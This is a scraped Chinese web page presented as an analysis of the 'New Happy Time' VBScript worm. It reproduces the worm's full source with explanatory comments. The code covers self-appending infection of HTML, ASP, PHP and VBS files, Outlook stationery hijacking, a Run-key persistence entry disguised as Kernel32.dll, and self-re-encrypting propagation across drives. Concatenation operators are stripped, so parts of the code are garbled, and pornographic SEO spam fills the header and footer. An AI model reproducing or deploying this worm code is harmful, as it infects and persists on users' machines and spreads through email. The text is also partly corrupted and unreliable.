婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 新歡樂時光代碼分析

新歡樂時光代碼分析

熱門標簽:隨州銷售外呼系統平臺 不同的地圖標注 臨滄移動外呼系統哪家有 激戰黃昏地圖標注說明 怎么更改地圖標注電話 防城港市ai電銷機器人 交行外呼系統有哪些 溫嶺代理外呼系統 寧夏保險智能外呼系統哪家好
%
Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk

Sub KJ_start()
    ' 初始化變量
    KJSetDim()
    ' 初始化環境
    KJCreateMilieu()
    ' 感染本地或者共享上與html所在目錄
    KJLikeIt()
    ' 通過vbs感染Outlook郵件模板
    KJCreateMail()
    ' 進行病毒傳播
    KJPropagate()
End Sub

' 函數:KJAppendTo(FilePath,TypeStr)
' 功能:向指定類型的指定文件追加病毒
' 參數:
' FilePath 指定文件路徑
' TypeStr 指定類型

Function KJAppendTo(FilePath, TypeStr)
    On Error Resume Next
    ' 以只讀方式打開指定文件
    Set ReadTemp = FSO.OpenTextFile(FilePath, 1)
    ' 將文件內容讀入到TmpStr變量中
    TmpStr = ReadTemp.ReadAll
    ' 判斷文件中是否存在"KJ_start()"字符串,若存在說明已經感染,退出函數;
    ' 若文件長度小于1,也退出函數。
    If InStr(TmpStr, "KJ_start()") > 0 Or Len(TmpStr)  1 Then
        ReadTemp.Close
        Exit Function
    End If
    ' 如果傳過來的類型是"htt"
    ' 在文件頭加上調用頁面的時候加載KJ_start()函數;
    ' 在文件尾追加html版本的加密病毒體。
    ' 如果是"html"
    ' 在文件尾追加調用頁面的時候加載KJ_start()函數和html版本的病毒體;
    ' 如果是"vbs"
    ' 在文件尾追加vbs版本的病毒體
    If TypeStr = "htt" Then
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath, 2)
        FileTemp.Write ""  "BODY onload="""
         "vbscript:"  "KJ_start()"""  ">"  vbCrLf  TmpStr  vbCrLf  HtmlText
        FileTemp.Close
        Set FAttrib = FSO.GetFile(FilePath)
        FAttrib.Attributes = 34
    Else
        ReadTemp.Close
        Set FileTemp = FSO.OpenTextFile(FilePath, 8)
        If TypeStr = "html" Then
            FileTemp.Write vbCrLf  ""  "HTML>"  vbCrLf  ""
             "BODY onload="""  "vbscript:"  "KJ_start()"""  ">"  vbCrLf  HtmlText
        ElseIf TypeStr = "vbs" Then
            FileTemp.Write vbCrLf  VbsText
        End If
        FileTemp.Close
    End If
End Function

' 函數:KJChangeSub(CurrentString,LastIndexChar)
' 功能:改變子目錄以及盤符
' 參數:
' CurrentString 當前目錄
' LastIndexChar 上一級目錄在當前路徑中的位置

Function KJChangeSub(CurrentString, LastIndexChar)
    ' 判斷是否是根目錄
    If LastIndexChar = 0 Then
        ' 如果是根目錄
        ' 如果是C:\,返回FinalyDisk盤,并將SubE置為0,
        ' 如果不是C:\,返回將當前盤符遞減1,并將SubE置為0
        If Left(LCase(CurrentString), 1) =  LCase("c") Then
            KJChangeSub = FinalyDisk  ":\"
            SubE = 0
        Else
            KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1)  ":\"
            SubE = 0
        End If
    Else
        ' 如果不是根目錄,則返回上一級目錄名稱
        KJChangeSub = Mid(CurrentString, 1, LastIndexChar)
    End If
End Function

' 函數:KJCreateMail()
' 功能:感染郵件部分

Function KJCreateMail()
    On Error Resume Next
    ' 如果當前執行文件是"html"的,就退出函數
    If InWhere = "html" Then
        Exit Function
    End If
    ' 取系統盤的空白頁的路徑
    ShareFile = Left(WinPath, 3)  "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
    ' 如果存在這個文件,就向其追加html的病毒體
    ' 否則生成含有病毒體的這個文件
    If (FSO.FileExists(ShareFile)) Then
        Call KJAppendTo(ShareFile, "html")
    Else
        Set FileTemp = FSO.OpenTextFile(ShareFile, 2, true)
        FileTemp.Write ""  "HTML>"  vbCrLf  ""  "BODY onload="""  "vbscript:"  "KJ_start()"""  ">"  vbCrLf  HtmlText
        FileTemp.Close
    End If
    ' 取得當前用戶的ID和OutLook的版本
    DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
    OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
    ' 激活信紙功能,并感染所有信紙
    WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"DefaultId"\Software\Microsoft\Outlook Express\" Left(OutLookVersion, 1) ".0\Mail\Compose Use Stationery", 1, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"DefaultId"\Software\Microsoft\Outlook Express\" Left(OutLookVersion, 1) ".0\Mail\Stationery Name", ShareFile)
    Call KJMailReg("HKEY_CURRENT_USER\Identities\"DefaultId"\Software\Microsoft\Outlook Express\" Left(OutLookVersion, 1) ".0\Mail\Wide Stationery Name", ShareFile)
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")
    WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"
    Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery", "blank")
    KJummageFolder(Left(WinPath, 3)  "Program Files\Common Files\Microsoft Shared\Stationery")
End Function


' 函數:KJCreateMilieu()
' 功能:創建系統環境

Function KJCreateMilieu()
    On Error Resume Next
    TempPath = ""
    ' 判斷操作系統是NT/2000還是9X
    If Not(FSO.FileExists(WinPath  "WScript.exe")) Then
        TempPath = "system32\"
    End If
    ' 為了文件名起到迷惑性,并且不會與系統文件沖突。
    ' 如果是NT/2000則啟動文件為system\Kernel32.dll
    ' 如果是9x啟動文件則為system\Kernel.dll
    If TempPath = "system32\" Then
        StartUpFile = WinPath  "SYSTEM\Kernel32.dll"
    Else
        StartUpFile = WinPath  "SYSTEM\Kernel.dll"
    End If
    ' 添加Run值,添加剛才生成的啟動文件路徑
    WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile
    ' 拷貝前期備份的文件到原來的目錄
    FSO.CopyFile WinPath  "web\kjwall.gif", WinPath  "web\Folder.htt"
    FSO.CopyFile WinPath  "system32\kjwall.gif", WinPath  "system32\desktop.ini"
    ' 向%windir%\web\Folder.htt追加病毒體
    Call KJAppendTo(WinPath  "web\Folder.htt", "htt")
    ' 改變dll的MIME頭
    ' 改變dll的默認圖標
    ' 改變dll的打開方式
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath  TempPath  "WScript.exe ""%1"" %*"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"
    WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"
    ' 啟動時加載的病毒文件中寫入病毒體
    Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, true)
    FileTemp.Write VbsText
    FileTemp.Close
End Function

' 函數:KJLikeIt()
' 功能:針對html文件進行處理,如果訪問的是本地的或者共享上的文件,將感染這個目錄

Function KJLikeIt()
    ' 如果當前執行文件不是"html"的就退出程序
    If InWhere > "html" Then
        Exit Function
    End If
    ' 取得文檔當前路徑
    ThisLocation = document.location
    ' 如果是本地或網上共享文件
    If Left(ThisLocation, 4) = "file" Then
        ThisLocation = Mid(ThisLocation, 9)
        ' 如果這個文件擴展名不為空,在ThisLocation中保存它的路徑
        If FSO.GetExtensionName(ThisLocation) > "" Then
            ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
        End If
        ' 如果ThisLocation的長度大于3就尾追一個"\"
        If Len(ThisLocation) > 3 Then
            ThisLocation = ThisLocation  "\"
        End If
        ' 感染這個目錄
        KJummageFolder(ThisLocation)
    End If
End Function

' 函數:KJMailReg(RegStr,FileName)
' 功能:如果注冊表指定鍵值不存在,則向指定位置寫入指定文件名
' 參數:
' RegStr 注冊表指定鍵值
' FileName 指定文件名

Function KJMailReg(RegStr, FileName)
    On Error Resume Next
    ' 如果注冊表指定鍵值不存在,則向指定位置寫入指定文件名
    RegTempStr = WsShell.RegRead(RegStr)
    If RegTempStr = "" Then
        WsShell.RegWrite RegStr, FileName
    End If
End Function

' 函數:KJOboSub(CurrentString)
' 功能:遍歷并返回目錄路徑
' 參數:
' CurrentString 當前目錄

Function KJOboSub(CurrentString)
    SubE = 0
    TestOut = 0
    Do While True
        TestOut = TestOut + 1
        If TestOut > 28 Then
            CurrentString = FinalyDisk  ":\"
            Exit Do
        End If
        On Error Resume Next
        ' 取得當前目錄的所有子目錄,并且放到字典中
        Set ThisFolder = FSO.GetFolder(CurrentString)
        Set DicSub = CreateObject("Scripting.Dictionary")
        Set Folders = ThisFolder.SubFolders
        FolderCount = 0
        For Each TempFolder in Folders
            FolderCount = FolderCount + 1
            DicSub.Add FolderCount, TempFolder.Name
        Next
        ' 如果沒有子目錄了,就調用KJChangeSub返回上一級目錄或者更換盤符,并將SubE置1
        If DicSub.Count = 0 Then
            LastIndexChar = InstrRev(CurrentString, "\", Len(CurrentString) -1)
            SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar -1)
            CurrentString = KJChangeSub(CurrentString, LastIndexChar)
            SubE = 1
        Else
            ' 如果存在子目錄
            ' 如果SubE為0,則將CurrentString變為它的第1個子目錄
            If SubE = 0 Then
                CurrentString = CurrentString  DicSub.Item(1)  "\"
                Exit Do
            Else
                ' 如果SubE為1,繼續遍歷子目錄,并將下一個子目錄返回
                j = 0
                For j = 1 To FolderCount
                    If LCase(SubString) = LCase(DicSub.Item(j)) Then
                        If j  FolderCount Then
                            CurrentString = CurrentString  DicSub.Item(j + 1)  "\"
                            Exit Do
                        End If
                    End If
                Next
                LastIndexChar = InstrRev(CurrentString, "\", Len(CurrentString) -1)
                SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar -1)
                CurrentString = KJChangeSub(CurrentString, LastIndexChar)
            End If
        End If
    Loop
    KJOboSub = CurrentString
End Function

' 函數:KJPropagate()
' 功能:病毒傳播

Function KJPropagate()
    On Error Resume Next
    RegPathvalue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
    DiskDegree = WsShell.RegRead(RegPathvalue)
    ' 如果不存在Degree這個鍵值,DiskDegree則為FinalyDisk盤
    If DiskDegree = "" Then
        DiskDegree = FinalyDisk  ":\"
    End If
    ' 繼DiskDegree置后感染5個目錄
    For i = 1 To 5
        DiskDegree = KJOboSub(DiskDegree)
        KJummageFolder(DiskDegree)
    Next
    ' 將感染記錄保存在"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"鍵值中
    WsShell.RegWrite RegPathvalue, DiskDegree
End Function

' 函數:KJummageFolder(PathName)
' 功能:感染指定目錄
' 參數:
' PathName 指定目錄

Function KJummageFolder(PathName)
    On Error Resume Next
    ' 取得目錄中的所有文件集
    Set FolderName = FSO.GetFolder(PathName)
    Set ThisFiles = FolderName.Files
    HttExists = 0
    For Each ThisFile In ThisFiles
        FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
        ' 判斷擴展名
        ' 若是HTM,HTML,ASP,PHP,JSP則向文件中追加HTML版的病毒體
        ' 若是VBS則向文件中追加VBS版的病毒體
        ' 若是HTT,則標志為已經存在HTT了
        If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
            Call KJAppendTo(ThisFile.Path, "html")
        ElseIf FileExt = "VBS" Then
            Call KJAppendTo(ThisFile.Path, "vbs")
        ElseIf FileExt = "HTT" Then
            HttExists = 1
        End If
    Next
    ' 如果所給的路徑是桌面,則標志為已經存在HTT了
    If (UCase(PathName) = UCase(WinPath  "Desktop\")) Or (UCase(PathName) = UCase(WinPath  "Desktop"))Then
        HttExists = 1
    End If
    ' 如果不存在HTT
    ' 向目錄中追加病毒體
    If HttExists = 0 Then
        FSO.CopyFile WinPath  "system32\desktop.ini", PathName
        FSO.CopyFile WinPath  "web\Folder.htt", PathName
    End If
End Function

' 函數KJSetDim()
' 定義FSO,WsShell對象
' 取得最后一個可用磁盤卷標
' 生成傳染用的加密字串
' 備份系統中的web\folder.htt和system32\desktop.ini

Function KJSetDim()
    On Error Resume Next
    Err.Clear

    ' 測試當前執行文件是html還是vbs
    TestIt = WScript.ScriptFullname
    If Err Then
        InWhere = "html"
    Else
        InWhere = "vbs"
    End If

    ' 創建文件訪問對象和Shell對象
    If InWhere = "vbs" Then
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Set WsShell = CreateObject("WScript.Shell")
    Else
        Set AppleObject = document.applets("KJ_guest")
        AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
        AppleObject.createInstance()
        Set WsShell = AppleObject.GetObject()
        AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
        AppleObject.createInstance()
        Set FSO = AppleObject.GetObject()
    End If
    Set DiskObject = FSO.Drives
    ' 判斷磁盤類型
    '
    ' 0: Unknown
    ' 1: Removable
    ' 2: Fixed
    ' 3: Network
    ' 4: CD-ROM
    ' 5: RAM Disk
    ' 如果不是可移動磁盤或者固定磁盤就跳出循環。可能作者考慮的是網絡磁盤、CD-ROM、RAM Disk都是在比較靠后的位置。呵呵,如果C:是RAMDISK會怎么樣?
    For Each DiskTemp In DiskObject
        If DiskTemp.DriveType > 2 And DiskTemp.DriveType > 1 Then
            Exit For
        End If
        FinalyDisk = DiskTemp.DriveLetter
    Next

    ' 此前的這段病毒體已經解密,并且存放在ThisText中,現在為了傳播,需要對它進行再加密。
    ' 加密算法
    Dim OtherArr(3)
    Randomize
    ' 隨機生成4個算子
    For i = 0 To 3
        OtherArr(i) = Int((9 * Rnd))
    Next
    TempString = ""
    For i = 1 To Len(ThisText)
        TempNum = Asc(Mid(ThisText, i, 1))
        '對回車、換行(0x0D,0x0A)做特別的處理
        If TempNum = 13 Then
            TempNum = 28
        ElseIf TempNum = 10 Then
            TempNum = 29
        End If
        '很簡單的加密處理,每個字符減去相應的算子,那么在解密的時候只要按照這個順序每個字符加上相應的算子就可以了。
        TempChar = Chr(TempNum - OtherArr(i Mod 4))
        If TempChar = Chr(34) Then
            TempChar = Chr(18)
        End If
        TempString = TempString  TempChar
    Next
    ' 含有解密算法的字串
    UnLockStr = "Execute(""Dim KeyArr(3),ThisText""vbCrLf""KeyArr(0) = "  OtherArr(0)  """vbCrLf""KeyArr(1) = "  OtherArr(1)  """vbCrLf""KeyArr(2) = "  OtherArr(2)  """vbCrLf""KeyArr(3) = "  OtherArr(3)  """vbCrLf""For i=1 To Len(ExeString)""vbCrLf""TempNum = Asc(Mid(ExeString,i,1))""vbCrLf""If TempNum = 18 Then""vbCrLf""TempNum = 34""vbCrLf""End If""vbCrLf""TempChar = Chr(TempNum + KeyArr(i Mod 4))""vbCrLf""If TempChar = Chr(28) Then""vbCrLf""TempChar = vbCr""vbCrLf""ElseIf TempChar = Chr(29) Then""vbCrLf""TempChar = vbLf""vbCrLf""End If""vbCrLf""ThisText = ThisText  TempChar""vbCrLf""Next"")"  vbCrLf  "Execute(ThisText)"
    ' 將加密好的病毒體復制給變量 ThisText
    ThisText = "ExeString = """  TempString  """"
    ' 生成html感染用的腳本
    HtmlText = ""  "script language=vbscript>"  vbCrLf  "document.write "  """"  ""  "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>"  """"""  "APPLET NAME=KJ""""_guest HEIGHT=0 WIDTH=0 code=com.ms.""""activeX.Active""""XComponent>"  ""  "/APPLET>"  ""  "/div>"""  vbCrLf  ""  "/script>"  vbCrLf  ""  "script language=vbscript>"  vbCrLf  ThisText  vbCrLf  UnLockStr  vbCrLf  ""  "/script>"  vbCrLf  ""  "/BODY>"  vbCrLf  ""  "/HTML>"
    ' 生成vbs感染用的腳本
    VbsText = ThisText  vbCrLf  UnLockStr  vbCrLf  "KJ_start()"
    ' 取得Windows目錄
    ' GetSpecialFolder(n)
    ' 0: WindowsFolder
    ' 1: SystemFolder
    ' 2: TemporaryFolder
    ' 如果系統目錄存在web\Folder.htt和system32\desktop.ini,則用kjwall.gif文件名備份它們。
    WinPath = FSO.GetSpecialFolder(0)  "\"
    If (FSO.FileExists(WinPath  "web\Folder.htt")) Then
        FSO.CopyFile WinPath  "web\Folder.htt", WinPath  "web\kjwall.gif"
    End If
    If (FSO.FileExists(WinPath  "system32\desktop.ini")) Then
        FSO.CopyFile WinPath  "system32\desktop.ini", WinPath  "system32\kjwall.gif"
    End If
End Function
%>

標簽:紅河 河源 忻州 哈密 沈陽 青海 阜陽 無錫

巨人網絡通訊聲明:本文標題《新歡樂時光代碼分析》,本文關鍵詞  新歡樂,新,歡樂,時光,代碼,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《新歡樂時光代碼分析》相關的同類信息!
  • 本頁收集關于新歡樂時光代碼分析的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    国产在线精品一区在线观看麻豆| 国产精品99久久久久久有的能看| 成人涩涩免费视频| 夜夜嗨av一区二区三区中文字幕| 日韩一区二区影院| 91激情在线视频| 国产精品夜夜嗨| 日韩1区2区3区| 亚洲欧美日韩精品久久久久| 日韩精品一区二| 日韩欧美久久久| 在线视频一区二区三区| 国产成人激情av| 国产毛片精品国产一区二区三区| 日精品一区二区| 国产午夜精品福利| 欧美成人精品福利| 91精品久久久久久久久99蜜臂| 欧美三级电影网站| 91成人免费在线| 在线观看欧美日本| 99久久精品国产一区| 国产一区二区导航在线播放| 国产高清不卡一区| 欧美aa在线视频| 六月婷婷色综合| 欧美日韩在线播放| 欧美色国产精品| 欧美日韩一区 二区 三区 久久精品| 成人av在线一区二区三区| 国产精品自拍网站| 成人免费高清视频在线观看| 国产精品自拍在线| 92精品国产成人观看免费| 成人av在线影院| 91亚洲国产成人精品一区二区三| 99精品视频在线播放观看| 国产成人一区二区精品非洲| 激情都市一区二区| 国产精品1024| 国产麻豆精品theporn| 国产iv一区二区三区| 顶级嫩模精品视频在线看| 国产91精品一区二区麻豆亚洲| 不卡电影一区二区三区| 99精品欧美一区| 精品视频在线视频| 精品国产乱码91久久久久久网站| 日韩精品专区在线| 国产欧美日韩亚州综合| 亚洲婷婷国产精品电影人久久| 亚洲综合免费观看高清完整版| 天堂av在线一区| 久久精品免费观看| 91亚洲资源网| 91精品免费在线观看| 国产精品夫妻自拍| 亚洲午夜三级在线| 国产精品99久久久久久似苏梦涵| 成人av网站在线观看| 97久久超碰国产精品| 91麻豆精品国产91久久久久久| 欧美精选午夜久久久乱码6080| 精品国产乱码久久久久久蜜臀| 亚洲欧美色一区| 色婷婷综合久色| 欧美日韩国产综合久久| 欧美r级在线观看| 亚洲麻豆国产自偷在线| 韩国三级电影一区二区| 色菇凉天天综合网| 精品成人a区在线观看| 亚洲欧美日韩在线播放| 激情综合五月婷婷| 3d成人h动漫网站入口| 国产精品全国免费观看高清| 日韩高清在线一区| 色婷婷一区二区三区四区| 精品对白一区国产伦| 日韩专区在线视频| 97se亚洲国产综合自在线观| 国产丝袜欧美中文另类| 日韩va欧美va亚洲va久久| 在线观看av一区二区| 国产精品毛片久久久久久| 日韩精品一二三区| 欧美在线一二三| 成人欧美一区二区三区黑人麻豆 | 欧美激情一区在线观看| 日韩高清不卡一区二区三区| 91色乱码一区二区三区| 久久蜜桃av一区精品变态类天堂 | 国产真实乱子伦精品视频| 欧美精品久久天天躁| 亚洲国产精品人人做人人爽| 91浏览器在线视频| **欧美大码日韩| 国产精品美女久久久久av爽李琼 | 日韩视频在线永久播放| 调教+趴+乳夹+国产+精品| 色老汉一区二区三区| 国产精品乱码人人做人人爱| 国产**成人网毛片九色| 精品国产乱码91久久久久久网站| 欧美a一区二区| 5月丁香婷婷综合| 精品无人码麻豆乱码1区2区| 欧美va亚洲va香蕉在线| 国内精品伊人久久久久av影院| 久久免费看少妇高潮| 国产毛片一区二区| 亚洲国产精品黑人久久久| 国产精品系列在线观看| 国产精品午夜免费| 91福利视频在线| 一区二区三区日本| 日韩三级在线免费观看| 蜜乳av一区二区三区| 日韩免费性生活视频播放| 麻豆精品新av中文字幕| 国产精品久久三| 91老司机福利 在线| 免费观看91视频大全| 亚洲精品一区二区三区蜜桃下载| 丰满少妇在线播放bd日韩电影| 欧美国产日产图区| 亚洲国产一区视频| 精品视频999| 男人的天堂亚洲一区| 国产亚洲成aⅴ人片在线观看| 国产成人欧美日韩在线电影| 亚洲视频综合在线| 欧美三区免费完整视频在线观看| 欧美a一区二区| 中文字幕在线播放不卡一区| 欧美群妇大交群中文字幕| 狠狠色综合播放一区二区| 国产日韩成人精品| 91影院在线观看| 中文字幕佐山爱一区二区免费| 69堂成人精品免费视频| 老汉av免费一区二区三区| 中文字幕一区二区5566日韩| av电影在线观看一区| 日韩高清在线观看| 国产精品人妖ts系列视频| 在线亚洲人成电影网站色www| 欧美日韩精品欧美日韩精品| 日韩vs国产vs欧美| 一区二区三区四区亚洲| 欧美成人vr18sexvr| 欧美性大战久久久久久久蜜臀| 毛片不卡一区二区| 一区二区三区在线免费观看| 国产日韩欧美综合在线| 91亚洲精品一区二区乱码| 国产一区二区精品久久91| 亚洲午夜精品久久久久久久久| 国产农村妇女精品| 91麻豆精品国产91久久久更新时间| 不卡一区中文字幕| 亚洲乱码国产乱码精品精98午夜| 国产亚洲欧美在线| 日韩丝袜美女视频| 欧美自拍偷拍一区| 91亚洲精品久久久蜜桃网站| 久久99深爱久久99精品| 爽好久久久欧美精品| 亚洲精品视频自拍| 中文字幕一区在线观看视频| 久久久久成人黄色影片| 在线播放中文一区| 欧美电影影音先锋| 欧美综合色免费| 在线播放91灌醉迷j高跟美女| 91色porny| 91老师国产黑色丝袜在线| 成熟亚洲日本毛茸茸凸凹| 强制捆绑调教一区二区| 日韩不卡一二三区| 日韩成人午夜电影| 久久99久久久欧美国产| 亚洲第一久久影院| 亚洲高清一区二区三区| 亚洲国产日产av| 视频一区视频二区在线观看| 婷婷成人综合网| 日本欧美加勒比视频| 另类调教123区| 蜜桃在线一区二区三区| 经典三级视频一区| 狠狠色丁香婷婷综合| 精一区二区三区| 国产福利不卡视频| 国产91精品在线观看| 在线精品视频免费观看| 成人中文字幕合集| 色婷婷综合激情| 欧美一级片在线| 国产校园另类小说区|